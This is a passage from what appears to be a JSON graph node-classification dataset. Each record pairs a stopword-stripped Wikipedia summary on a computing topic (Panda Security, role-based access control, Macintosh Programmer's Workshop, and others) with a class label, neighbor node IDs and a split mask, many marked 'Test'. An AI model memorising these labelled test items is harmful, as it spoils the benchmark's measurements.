    "text": "Linux_Software_Map:linux software map linux software map lsm standard text file format describing linux software also refers database constructed files lsm one standard methods announcing new software release linux linux program distributed widely lsm file may created describe program normally file called software_package_name .lsm file begins begin4 ends end one field line field name separated value colon mandatory fields title version entered-date description author primary-site blank lsm template looks like time writing collective database lsm entries searched order locate software particular type database passed various owners created jeff kopmanis lars wirzenius maintained current maintainer aaron schrab help volunteers database downloaded entirety one perform limited queries using web interface",
    "neighbors": [
      2901,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 202,
    "label": 4,
    "text": "Panda_Security:panda security panda security spanish company specializes creating products security started antivirus software also provides develops cybersecurity software includes security products services businesses home users protection tools systems networks emails private information 2005 panda security fourth largest antivirus vendor worldwide 3.2 marketplace november 2015 opswat measured panda security market share 3.6 company whose shares previously 100 held urizarbarrena announced 24 april 2007 sale 75 shares southern european investment group investindustrial private equity firm gala capital 30 july 2007 company changed name panda software panda security urizarbarrena replaced jorge dinares almost one year later 3 june 2008 amidst flagging sales board directors voted replace dinares juan santana ceo santana resigned september 2011 replaced josé sancho acting ceo panda security rated jan 2018 gartner analysts endpoint protection visionary technological milestones include launch security systems saas concept security service antivirus solutions provide protection cloud cloud computing based panda calls collective intelligence security model panda introduced market 2007 according ceo main benefit security model provides allows automatic scanning threats instead manual scans carried companies firm subsidiaries us italy switzerland germany austria belgium netherlands france uk sweden finland spain japan additionally franchises another 44 countries us subsidiary five management turnovers since 2007 moving headquarters orlando florida 2009 late 2009 panda security created partnership web trust help fight war viruses panda previously embroiled lawsuit one channel partners external technologies inc 2013 panda prevailed lawsuit external technologies recovering judgment excess 100,000 prevailing claims asserted external panda 3 august 2010 new office location menlo park california publicly announced panda ceo via twitter account 2012 firm tenth largest antivirus vendor worldwide 2.0 marketplace truprevent introduced 2003 firm technologies proactive protection opposed traditional antivirus products provide reactive protection offers generic protection many techniques used new malware policies rules developed based new vulnerabilities appear daily collective intelligence ” firm protection system automatically detect scan classify malware real time introduced 2007 technology implemented 2009 2010 antivirus products home users panda cloud antivirus company classified first antivirus history provides protection cloud 2015 panda security obtained best rate protection real world protection test av-comparatives 2018 panda antivirus received gold award av-comparatives whole product dynamic “ real-world ” protection test panda security named company year 2016 leading spanish newspaper el suplemento innovative work growth outreach history panda adaptive defense first endpoint detection response edr security solution achieve eal2+ security certification common criteria standard published boe official state bulletin may 2018 listed h “ qualified security product ” spanish national cryptologic center may 2018 2016 named best advanced persistent threat apt solution computing magazines security excellence awards 2018 recognised pc pro a-list security product second year running received pro editor choice award calling “ smarter average protection solution ”",
    "neighbors": [
      2049,
      4994,
      131,
      5891,
      7809,
      1417,
      3724,
      3981,
      10637,
      4374,
      1052,
      156,
      11166,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      4133,
      2601,
      6823,
      2859,
      3243,
      6699,
      8614,
      8615,
      6834,
      4403,
      9523,
      10166,
      3065,
      7103,
      704,
      9537,
      7362,
      3395,
      8131,
      4421,
      10308,
      8904,
      1994,
      1355,
      5069,
      10574,
      9168,
      6993,
      10962,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      4194,
      3941,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      1781,
      503,
      10872,
      2425,
      378,
      9341,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 203,
    "label": 7,
    "text": "Suffix_tree_clustering:suffix tree clustering suffix tree clustering often abbreviated stc approach clustering uses suffix trees suffix tree cluster keeps track n-grams given length inserted set word string simultaneously allowing differing strings inserted incrementally linear order advantage ensuring large number clusters handled sequentially however potential disadvantage may also increases number possible documents need looked handling large sets data suffix tree clusters either decompositional agglomerative nature depending type data handled",
    "neighbors": [
      1044
    ],
    "mask": "Test"
  },
  {
    "node_id": 204,
    "label": 3,
    "text": "Romance_of_the_Three_Kingdoms_II:romance three kingdoms ii upon starting game players choose one six scenarios determine initial layout power ancient china scenarios loosely depict allegiances territories controlled warlords according novel although gameplay follow events novel game begins six scenarios listed follows choosing scenario players determine warlord control custom characters may inserted territories unoccupied forces well total 41 different provinces exist well 200 unique characters character three statistics range 10 100 higher better warlord intelligence war ability charm influence successful performing certain tasks dueling increasing land value province player wins game conquering territories china accomplished control every province map computer gaming world stated romance three kingdoms ii better job simulating chaos second-century china game predecessor 1993 survey pre 20th-century strategy games magazine gave game four stars five release famicom tsūshin scored famicom version game 30 40",
    "neighbors": [
      11477,
      9166
    ],
    "mask": "None"
  },
  {
    "node_id": 205,
    "label": 9,
    "text": "Kent_Pitman:kent pitman kent m. pitman kmp programmer involved many years design implementation use systems based programming languages lisp scheme president hypermeta inc. pitman chair ad hoc group part x3j13 designed common lisp error condition system author proposal document ultimately adopted many papers lisp programming computer programming general high school saw output one guess animal pseudo-artificial intelligence ai games popular considered implementing version program basic massachusetts institute technology mit instead implemented several dialects lisp including maclisp technical contributor x3j13 american national standards institute ansi subcommittee standardized common lisp contributed design programming language prepared document became ansi common lisp common lisp hyperspec hypertext conversion standard document became international organization standardization iso islisp often found usenet newsgroup comp.lang.lisp involved discussions lisp computer programming insider perspectives lisp evolution common lisp standardization posts expressed opinion open-source software including open source implementations lisp scheme something judged individually essential merits rather automatically considered good merely free open",
    "neighbors": [
      10752,
      4097,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      3350,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      8558,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      11226,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 206,
    "label": 7,
    "text": "HP_RTR:hp rtr hp reliable transaction router rtr transactional middleware computer software marketed hewlett packard rtr used integrate applications require reliable transaction services rtr manages messages sent client-server provide node network fail-over increased reliability transactional integrity interoperability dissimilar systems rtr software three logical entities referred front-end fe back-end transaction-router tr router software component provides fail-over intelligence manages connections back-end client applications running front-end combined router server applications running back-end interact provide transaction integrity reliability three logical entities exist node usually deployed different nodes achieve modularity scalability high availability client application interacts front-end forwards messages router router turn routes message intended back-end appropriate server application available processing message rtr routing capability partitions data across multiple servers nodes increased performance within application partition determines messages routed client servers message exchange happens client server transactions start client involve many messages go number different servers method messaging used situations multiple recipients message unsolicited messages need sent rtr help survive failures generally seen distributed application environment include complete site failure node failure network link failure software process failure rtr also provides continuous availability using redundant resources distributed environment rtr provides web interface command line interface cli managing rtr environment rtr components running along applications client application server application rtr services active rtr integrated client applications customized user management applications written using rtr apis c c++ java .net variants apis available creating applications use rtr rtr first conceived zurich switzerland dr. paul shrager early 1988 developed small team four engineers working dec digital equipment corporation initial release written mix macro bliss pascal sdl top decnet vms later reimplemented c top tcp/ip stack os agnostic infrastructure allowed deployed multiple operating systems including various flavors unix/linux vms windows java c++ veneer added mid 90s support rpc style veneer top services oriented interface rtr one first oltp middleware services provided following features addition usual ones viz additionally rtr guarantees data equivalence repositories behind primary shadow servers enforcing deduced dependency relationship among set concurrent transactions shadowed allows rtr process multiple transactions shadow without compromising dependency violations high profile users banks stock exchanges railway passenger reservation systems rtr available hp-ux linux windows openvms 2010",
    "neighbors": [
      8122,
      2948,
      5677,
      6797,
      3573,
      823,
      1304,
      5658
    ],
    "mask": "Test"
  },
  {
    "node_id": 207,
    "label": 9,
    "text": "John_Chambers_(statistician):john chambers statistician john mckinley chambers creator programming language core member r programming language project awarded 1998 acm software system award developing s. donated prize money us 10,000 american statistical association endow award novel statistical software chambers fellow american statistical association american association advancement science institute mathematical statistics consulting professor statistics stanford university received b.sc university toronto m.a ph.d. degrees statistics harvard university",
    "neighbors": [
      5833,
      623
    ],
    "mask": "Test"
  },
  {
    "node_id": 208,
    "label": 4,
    "text": "William_Binney_(intelligence_official):william binney intelligence official william edward binney former highly placed intelligence official united states national security agency nsa turned whistleblower retired october 31 2001 30 years agency high-profile critic former employers george w. bush administration later criticized nsa data collection policies barack obama administration 2016 binney said u.s. intelligence community assessment russia interfered 2016 presidential election false close examination documents purported prove british origin hacking could prove data downloaded democratic national committee binney grew rural pennsylvania graduated bachelor science degree mathematics pennsylvania state university 1970 said volunteered army vietnam era order select work would interest rather drafted input found strong aptitudes mathematics analysis code breaking served 1965 1969 army security agency going nsa 1970 binney russia specialist worked operations side intelligence starting analyst ending technical director prior becoming geopolitical world technical director 1990s co-founded unit automating signals intelligence nsa research chief dr. john taggart binney nsa career culminated technical leader intelligence 2001 expertise intelligence analysis traffic analysis systems analysis knowledge management mathematics including set theory number theory probability retiring nsa founded together fellow nsa whistleblower j. kirk wiebe entity mapping llc private intelligence agency market analysis program government agencies kirk wiebe william binney started company pretty good knowledge partners amsterdam netherlands resurrect kinds smart things thought data back 1990s government deep state well shadow government n't want us 're september 2002 along j. kirk wiebe edward loomis asked u.s. defense department inspector general dod ig investigate nsa allegedly wasting millions millions dollars trailblazer system intended analyze mass collection data carried communications networks internet binney one inventors alternative system thinthread shelved trailblazer chosen instead binney also publicly critical nsa spying u.s. citizens saying expanded surveillance september 11 2001 attacks better anything kgb stasi gestapo ss ever well noting trailblazer ineffectiveness unjustified high cost compared far less intrusive thinthread furious nsa n't uncovered 9/11 plot stated intercepts collected analyzed likely would garnered timely attention leaner focused system left nsa 2001 binney one several people investigated part inquiry 2005 new york times exposé agency warrantless eavesdropping program binney cleared wrongdoing three interviews fbi agents beginning march 2007 early july 2007 unannounced armed early morning raid dozen agents armed rifles appeared house one entered bathroom pointed gun binney taking shower fbi confiscated desktop computer disks personal business records nsa revoked security clearance forcing close business ran former colleagues loss reported 300,000 annual income fbi raided homes wiebe loomis well house intelligence committee staffer diane roark morning several months later fbi raided home still active nsa executive thomas andrews drake also contacted dod ig anonymously confidentiality assured assistant inspector general john crane charge whistleblower program suspecting superiors provided confidential information united states department justice doj challenged eventually forced position subsequently became public whistleblower punitive treatment binney drake whistleblowers also led edward snowden go public revelations rather report internal whistleblower program 2012 binney co-plaintiffs went federal court retrieve confiscated items binney known making claim nsa collects stores information every u.s. communication binney invited witness nsa commission german bundestag july 3 2014 der spiegel wrote said nsa wanted information everything binney view totalitarian approach previously seen dictatorships binney stated goal control people meanwhile said possible principle monitor whole population abroad u.s. view contradicts united states constitution august 2014 binney among signatories open letter group veteran intelligence professionals sanity german chancellor angela merkel urged chancellor suspicious u.s. intelligence regarding alleged invasion russia eastern ukraine open letter group said ccusations major russian invasion ukraine appear supported reliable intelligence rather intelligence seems dubious politically fixed kind used 12 years ago justify u.s.-led attack iraq binney claims u.s. intelligence community assessment russia interfered 2016 presidential election false democratic national committee e-mails leaked insider instead appeared fox news least ten times september 2016 november 2017 promote theory binney said intelligence community n't honest also frequently cited breitbart news november 2017 reported month earlier binney met cia director mike pompeo behest president trump july 2018 shown binney persuaded pro-kremlin disinformant theft dnc emails inside job work russian agents contrary findings us intelligence community disinformation agent manipulated metadata files released guccifer 2.0 us intelligence community identifies russian military intelligence operation prove documents came computer eastern united states russia binney subsequently appeared multiple times fox news advocate inside job theory binney later rejected manipulated documents valid concluded support inside job theory binney said voted trump 2016 presidential election calling hillary clinton war monger january 23 2018 binney made appearance infowars news program connection nunes memo congressional document alleging irregularities application fisa act time publicly available although potential release topic public debate show host alex jones announced binney able provide actual memo purported leaked document shown air however fact public document available website office director national intelligence since least may 2017 actual nunes memo released february 2 2018 binney story recounted good american documentary film",
    "neighbors": [
      1930,
      1169,
      9233,
      1941,
      4118,
      8356,
      3495,
      8104,
      8750,
      6344,
      10697,
      7887,
      208,
      7893,
      9558,
      600,
      7652,
      3305,
      4595
    ],
    "mask": "Test"
  },
  {
    "node_id": 209,
    "label": 2,
    "text": "Gestalt_(Mac_OS):gestalt mac os gestalt name system call introduced apple macintosh operating system system software 6.0.4 1989 allow applications dynamically query capabilities present running system configuration time pace mac development produced proliferation hardware configurations hardware software add-ons apple third parties simple version check longer enough determine features system instead gestalt maintains dynamically-extensible table ostype selector codes instance instead checking system version deduce version sound manager might present separate gestalt selector directly querying capabilities sound manager thus could made possible application dependent capabilities introduced newer sound manager run older system updated sound manager installed add-on well newer system new sound manager built-in course sound manager add-on could also query gestalt selector first decide whether point installing current system value returned querying selector code 32 bits whose meaning depends selector selectors define version code others use bit mask available capabilities subsystems define types selectors allowing querying version number capabilities even use gestalt selector pass address shared block data even address code could called since piece code installed gestalt selector could either install simple static value callback gestalt would invoke every time somebody queried selector possible value returned vary dynamically call call reflect information current state subsystem macintosh programmer workshop also provided tool named gestalt allowed developer test various features using command line gestalt school psychology attempts describe whole mental activity analyzing parts often associated phrase whole different sum parts german language word means shape",
    "neighbors": [
      10691,
      11171,
      7983,
      6165,
      213,
      8665,
      3324,
      10975
    ],
    "mask": "None"
  },
  {
    "node_id": 210,
    "label": 4,
    "text": "Role-based_access_control:role-based access control computer systems security role-based access control rbac role-based security approach restricting system access authorized users used majority enterprises 500 employees implement mandatory access control mac discretionary access control dac role-based access control rbac policy-neutral access-control mechanism defined around roles privileges components rbac role-permissions user-role role-role relationships make simple perform user assignments study nist demonstrated rbac addresses many needs commercial government organizations rbac used facilitate administration security large organizations hundreds users thousands permissions although rbac different mac dac access control frameworks enforce policies without complication within organization roles created various job functions permissions perform certain operations assigned specific roles members staff system users assigned particular roles role assignments acquire permissions needed perform particular system functions since users assigned permissions directly acquire role roles management individual user rights becomes matter simply assigning appropriate roles user account simplifies common operations adding user changing user department three primary rules defined rbac additional constraints may applied well roles combined hierarchy higher-level roles subsume permissions owned sub-roles concepts role hierarchy constraints one control rbac create simulate lattice-based access control lbac thus rbac considered superset lbac defining rbac model following conventions useful constraint places restrictive rule potential inheritance permissions opposing roles thus used achieve appropriate separation duties example person allowed create login account authorize account creation thus using set theory notation subject may multiple simultaneous sessions with/in different roles nist/ansi/incits rbac standard 2004 recognizes three levels rbac rbac flexible access control technology whose flexibility allows implement dac mac dac groups e.g. implemented posix file systems emulate rbac mac simulate rbac role graph restricted tree rather partially ordered set prior development rbac bell-lapadula blp model synonymous mac file system permissions synonymous dac considered known models access control model blp considered dac model vice versa research late 1990s demonstrated rbac falls neither category unlike context-based access control cbac rbac look message context connection source rbac also criticized leading role explosion problem large enterprise systems require access control finer granularity rbac provide roles inherently assigned operations data types resemblance cbac entity-relationship based access control erbac although acronym also used modified rbac systems extended role-based access control system able secure instances data considering association executing subject rbac differs access control lists acls used traditional discretionary access-control systems rbac systems assign permissions specific operations meaning organization rather low-level data objects example access control list could used granting denying write access particular system file would dictate file could changed rbac-based system operation might 'create credit account transaction financial application 'populate blood sugar level test record medical application assignment permission perform particular operation meaningful operations granular meaning within application rbac shown particularly well suited separation duties sod requirements ensure two people must involved authorizing critical operations necessary sufficient conditions safety sod rbac analyzed underlying principle sod individual able effect breach security dual privilege extension person may hold role exercises audit control review authority another concurrently held role minimal rbac model rbacm compared acl mechanism aclg groups permitted entries acl barkley 1997 showed rbacm aclg equivalent modern sql implementations like acl cakephp framework acl also manage groups inheritance hierarchy groups aspect specific modern acl implementations compared specific modern rbac implementations better old file system implementations data interchange high level comparisons acl data translated xacml attribute-based access control abac model evolves rbac consider additional attributes addition roles groups abac possible use attributes abac policy-based sense uses policies rather static permissions define allowed allowed use rbac manage user privileges computer permissions within single system application widely accepted best practice 2010 report prepared nist research triangle institute analyzed economic value rbac enterprises estimated benefits per employee reduced employee downtime efficient provisioning efficient access control policy administration organization heterogeneous infrastructure requirements span dozens hundreds systems applications using rbac manage sufficient roles assign adequate role memberships becomes extremely complex without hierarchical creation roles privilege assignments newer systems extend older nist rbac model address limitations rbac enterprise-wide deployments nist model adopted standard incits ansi/incits 359-2004 discussion design choices nist model also published aligning access rights governance needs responsibility metamodel remmo frame enterprise architecture expressive responsibility metamodel defined allows representing existing responsibilities business layer thereby allows engineering access rights required perform responsibilities application layer method proposed define access rights accurately considering alignment responsibility rbac",
    "neighbors": [
      128,
      1792,
      8838,
      9614,
      8210,
      10389,
      3616,
      6563,
      1066,
      10413,
      1327,
      4912,
      2737,
      11184,
      4404,
      5812,
      10933,
      10170,
      3521,
      5573,
      10580,
      1366,
      7260,
      2013,
      3042,
      1509,
      9958,
      9705,
      6381,
      11507,
      5624,
      633,
      8954
    ],
    "mask": "None"
  },
  {
    "node_id": 211,
    "label": 8,
    "text": "Elemenope:elemenope created maintained createtank elemenope service oriented architecture soa general messaging framework elemenope may also considered application toolkit elemenope correctly spelled completely lowercase pronounced l-m-n-o-p el-em-en-o-'pe\\ elemenope active development since 1999 framework started manner simplify process integrating legacy systems new development elemenope served proving grounds architectural concepts elemenope released free open source software foss 2003 originally licensed gnu general public license apache license 2.0 added additional licensing option 2006",
    "neighbors": [
      3558,
      4107,
      5612,
      7983,
      10486,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 212,
    "label": 4,
    "text": "Known-key_distinguishing_attack:known-key distinguishing attack cryptography known-key distinguishing attack attack model symmetric ciphers whereby attacker knows key find structural property cipher transformation plaintext ciphertext random common formal definition transformation may chosen-key distinguishing attack strongly related attacker choose key introduce transformations attacks directly compromise confidentiality ciphers classical scenario key unknown attacker known-/chosen-key distinguishing attacks apply open key model instead known applicable situations block ciphers converted hash functions leading practical collision attacks hash known-key distinguishing attacks first introduced 2007 lars knudsen vincent rijmen paper proposed attack 7 10 rounds aes cipher another attack generalized feistel cipher attack finds plaintext/ciphertext pairs cipher known key input output least significant bits set zero less 2 time fewer half block size attacks also applied reduced-round threefish skein phelix",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      1315,
      4389,
      10662,
      169,
      6954,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      9556,
      10963,
      11349,
      2265,
      7643,
      8286,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "None"
  },
  {
    "node_id": 213,
    "label": 2,
    "text": "Macintosh_Programmer's_Workshop:macintosh programmer workshop macintosh programmer workshop mpw software development environment classic mac os operating system written apple computer macintosh developers one primary tools building applications system 7.x mac os 8.x 9.x initially mpw available purchase part apple professional developers program apple made free download superseded codewarrior mac os x replaced project builder ide eventually became xcode mpw provided command line environment tools including 68k powerpc assemblers well pascal c c++ compilers shell environment somewhat similar unix shells design designed around macintosh character set gui replacing usual terminal environment worksheet interface allowing user select run arbitrary sections shell script redo commands retyping addition command line tools commonly provided somewhat standardized graphical interface named commando provided limited access command line capabilities program debuggers integrated mpw like ides today language compilers supported symbolic debugging information file format used debugger mpw supported source-level debugger called sade symbolic application debugging environment sade mpw tool ran separate application user interface similar mpw apple compilers features common platforms—for example pascal compiler object-oriented c c++ compilers included support length-prefixed strings needed pascal-oriented apis pascal apple original preferred language macintosh software development mpw initially released pascal support c compiler released mpw 2.0 mpw c compiler written contract apple greenhills addition original mpw c compiler known casual frequently humorous error messages already function well occasionally addressing users name quirks carried powerpc transition apple replaced originals compilers written symantec pascal support longer provided mid-90s due declining popularity language mpw always targeted professional audience seldom used hobbyist developers due considerable price package time made freeware long since superseded offerings symantec metrowerks well apple development tools inherited next distributed free os x also occasionally available wrapper environment third-party compilers practice used metrowerks absoft among others apple officially discontinued development mpw last version os x run 10.4 'tiger last one support classic environment apple maintained web site mailing lists supported software long discontinuation site redirects xcode page mpw shell featured redirection output files windows file open output would go file open window redirection output required significant patching file system calls tools need anything special inherit feature mpw shell work mpw shell command language based unix csh language extended support main features macintosh gui simple commands create menus dialogs prompts new shell windows cursor could controlled mpw scripts tools could easily attached menu item command key shortcuts could specified window size location could controlled features popular commercial production environments complicated build packaging processes controlled elaborate scripts shell important differences unix counterparts instance classic mac os nothing comparable unix fork mpw tools effectively called subroutines shell one could running one time tools could run tools limitations inspiration macrelix project unix-like system classic mac os functionally worksheet cross text editor document xterm window worksheet window persistently bound file user may type anything anywhere window including commands executed via keyboard enter key command output appears insertion point unlike xterm window mpw worksheet always visual editing mode freely reorganized user hence worksheet purely command script purely text document mixture two—an integrated document describing history maintenance procedures test results software project commercial bbedit text editor retains feature calls shell worksheets mac os x emacs text editor provides shell buffers similar feature works across platforms mpw included version make syntax conceptually similar unix make macroman long f character indicate dependencies significantly since limitations shell precluded make program running tools work composing script compile/link actions run delivering shell execution good enough time precluded makefiles could make on-the-fly decisions based results previous action although implemented mpw tools package also came several source-level debuggers history sourcebug sade symbolic application debugging environment used mc680x0 systems power mac debugger known development r2db provided local remote debugging services powerpc systems latter using server program known debugger nub computer debugged mpw included set standard c libraries sufficient developers build mpw tools many unix utilities could ported little change one point difficulty mac os newline convention different unix another pathname separator mac os many unix utilities assumed many unix utilities also assumed pathnames would embedded spaces common practice macs number years gnu toolchain included portability support mpw part libiberty used support mpw-hosted cross-compilers used general magic several developers mpw started late 1985 rick meyers jeff parrish dan smith dan keller going called macintosh programmer system mps notice coincidentally three last names start mps 'mps always creator signature mpw shell result since mpw successor lisa workshop decided rename macintosh programmer workshop mpw mac applications cross-developed lisa mpw pascal compiler descended lisa pascal compiler apple larry tesler worked niklaus wirth come object pascal extensions ken doyle incorporated one last versions lisa pascal compiler enabled macapp early contributors included rick meyers project lead mpw shell command interpreter jeff parrish mpw shell editor dan smith mpw shell commands ira ruben assembler many tools including backup pasmat fred forsman make print sade assembler macro processor al hoffman pascal compiler roger lawrence pascal c compilers including error messages ken friedenbach linker johan strandberg rez derez rezdet steve hartwell c libraries dan allen macsbug editor apple numerics group also contributed math libraries mpw 1.0 completed september 24 1986 shell memory leak fixed october 10 1986 mpw 1.0.1 born mpw 2.0 completed july 20 1987 mpw 3.0 done november 30 1988 mpw 3.1 3.2 3.3 came next years mpw 3.4 completed july 14 1995 mpw 3.5 done december 17 1999 work done mpw 3.6 work halted late 2001 mpw twilight years greg branche supported mpw unofficially apple mpw-dev mailing list list lists.apple.com server hosted planned shut january 17 2014 decision later reversed mpw still used develop mac os x support limited carbon applications powerpc-based computers develop mac os x applications based technologies one must use either xcode another os x compatible development environment mpw also included version control system called projector superseded modern version control systems longer supported mac os x",
    "neighbors": [
      1666,
      2181,
      1542,
      3598,
      5520,
      11037,
      1952,
      6048,
      3107,
      11171,
      3241,
      4398,
      7983,
      8114,
      11442,
      1592,
      576,
      10432,
      6979,
      10052,
      713,
      9035,
      8524,
      2253,
      209,
      477,
      3167,
      7775,
      2786,
      6498,
      9700,
      6377,
      4844,
      10478,
      3571,
      5619,
      8700,
      7163,
      3324,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 214,
    "label": 2,
    "text": "Microsoft_Speech_API:microsoft speech api speech application programming interface sapi api developed microsoft allow use speech recognition speech synthesis within windows applications date number versions api released shipped either part speech sdk part windows os applications use sapi include microsoft office microsoft agent microsoft speech server general versions api designed software developer write application perform speech recognition synthesis using standard set interfaces accessible variety programming languages addition possible 3rd-party company produce speech recognition text-to-speech engines adapt existing engines work sapi principle long engines conform defined interfaces used instead microsoft-supplied engines general speech api freely redistributable component shipped windows application wishes use speech technology many versions although speech recognition synthesis engines also freely redistributable two main 'families microsoft speech api sapi versions 1 4 similar extra features newer version sapi 5 however completely new interface released 2000 since several sub-versions api released speech api viewed interface piece middleware sits applications speech engines recognition synthesis sapi versions 1 4 applications could directly communicate engines api included abstract interface definition applications engines conformed applications could also use simplified higher-level objects rather directly call methods engines sapi 5 however applications engines directly communicate instead talks runtime component sapi.dll api implemented component applications use another set interfaces engines typically sapi 5 applications issue calls api example load recognition grammar start recognition provide text synthesized sapi.dll runtime component interprets commands processes necessary calling engine engine interfaces example loading grammar file done runtime grammar data passed recognition engine actually use recognition recognition synthesis engines also generate events processing example indicate utterance recognized indicate word boundaries synthesized speech pass reverse direction engines runtime dll event sink application addition actual api definition runtime dll components shipped versions sapi make complete speech software development kit following components among included versions speech sdk xuedong huang key person led microsoft early sapi efforts first version sapi released 1995 supported windows 95 windows nt 3.51 version included low-level direct speech recognition direct text speech apis applications could use directly control engines well simplified 'higher-level voice command voice talk apis sapi 3.0 released 1997 added limited support dictation speech recognition discrete speech continuous additional sample applications audio sources sapi 4.0 released 1998 version sapi included core com api together c++ wrapper classes make programming c++ easier activex controls allow drag-and-drop visual basic development shipped part sdk included recognition synthesis engines also shipped synthesis engines windows 2000 main components sapi 4 api available c++ com activex flavors speech sdk version 5.0 incorporating sapi 5.0 runtime released 2000 complete redesign previous versions neither engines applications used older versions sapi could use new version without considerable modification design new api included concept strictly separating application engine calls routed runtime sapi.dll change intended make api 'engine-independent preventing applications inadvertently depending features specific engine addition change aimed making much easier incorporate speech technology application moving management initialization code runtime new api initially pure com api could used easily c/c++ support vb scripting languages added later operating systems windows 98 nt 4.0 upwards supported major features api include version shipped late 2000 part speech sdk version 5.0 together version 5.0 recognition synthesis engines recognition engines supported continuous dictation command control released u.s. english japanese simplified chinese versions u.s. english system special acoustic models available children speech telephony speech synthesis engine available english chinese version api recognition engines also shipped microsoft office xp 2001 version shipped late 2001 part speech sdk version 5.1 automation-compliant interfaces added api allow use visual basic scripting languages jscript managed code version api tts engines shipped windows xp windows xp tablet pc edition office 2003 also include version substantially improved version 6 recognition engine traditional chinese special version api use microsoft speech server shipped 2004 added support srgs ssml mark-up languages well additional server features performance improvements speech server also shipped version 6 desktop recognition engine version 7 server recognition engine version api ships windows vista together new recognition synthesis engines windows speech recognition integrated operating system speech sdk apis part windows sdk sapi 5.3 includes following new features updated version api ships windows 7 microsoft sam speech articulation module commonly shipped sapi 5 voice addition microsoft office xp office 2003 installed l h michael michelle voices sapi 5.1 sdk installs 2 voices mike mary windows vista includes microsoft anna replaces microsoft sam sounds natural intelligible also installed windows xp microsoft streets trips 2006 later versions chinese version vista later windows client versions also include female voice named microsoft lili managed code api ships part .net framework 3.0 similar functionality sapi 5 suitable used managed code applications new api available windows xp windows server 2003 windows vista windows server 2008 existing sapi 5 api also used managed code limited extent creating com interop code helper code designed assist accessing com interfaces classes works well scenarios however new api provide seamless experience equivalent using managed code library however major obstacle towards transitioning com interop fact managed implementation subtle memory leaks lead memory fragmentation exclude use library non-trivial applications workaround microsoft suggested using different api fewer voices windows vista includes number new speech-related features including microsoft agent notably microsoft speech applications use sapi 5 speech api compatible following operating systems",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      2590,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      5225,
      1656,
      5754,
      9340,
      641,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4768,
      4771,
      7846,
      2221,
      10414,
      3250,
      6838,
      8391,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      11004,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      10557,
      5952,
      1348,
      844,
      847,
      3413,
      10079,
      11616,
      2943,
      1407,
      3462,
      9609,
      9612,
      3471,
      8080,
      9114,
      10654,
      8607,
      11683,
      3496,
      6584,
      2493,
      6088,
      3533,
      7629,
      479,
      8161,
      6114,
      4074,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 215,
    "label": 4,
    "text": "Arne_Vidstrom:arne vidstrom arne vidstrom microsoft windows security expert noted discovering number windows security vulnerabilities well developing wups toolkit arguably best freeware udp scanner nt",
    "neighbors": [
      8976,
      6797,
      11413
    ],
    "mask": "Test"
  },
  {
    "node_id": 216,
    "label": 5,
    "text": "Internet_Fibre_Channel_Protocol:internet fibre channel protocol internet fibre channel protocol ifcp gateway-to-gateway network protocol standard provides fibre channel fabric functionality fibre channel devices ip network officially ratified internet engineering task force common forms 1 gbit/s 2 gbit/s 4 gbit/s 8 gbit/s 10 gbit/s ifcp protocol enables implementation fibre channel functionality ip network within fibre channel switching routing infrastructure replaced ip components technology congestion control error detection recovery provided use tcp transmission control protocol primary objective ifcp allow existing fibre channel devices networked interconnected ip based network wire speeds method address translation defined protocol permit fibre channel storage devices host adapters attached ip-based fabric using transparent gateways ifcp protocol layer main function transport fibre channel frame images fibre channel ports attached locally remotely ifcp encapsulates routes fibre channel frames make fibre channel information unit via predetermined tcp connection transport across ip network transporting frames remote fibre channel port",
    "neighbors": [
      5472,
      10924,
      1743,
      7863,
      5437,
      4638
    ],
    "mask": "None"
  },
  {
    "node_id": 217,
    "label": 3,
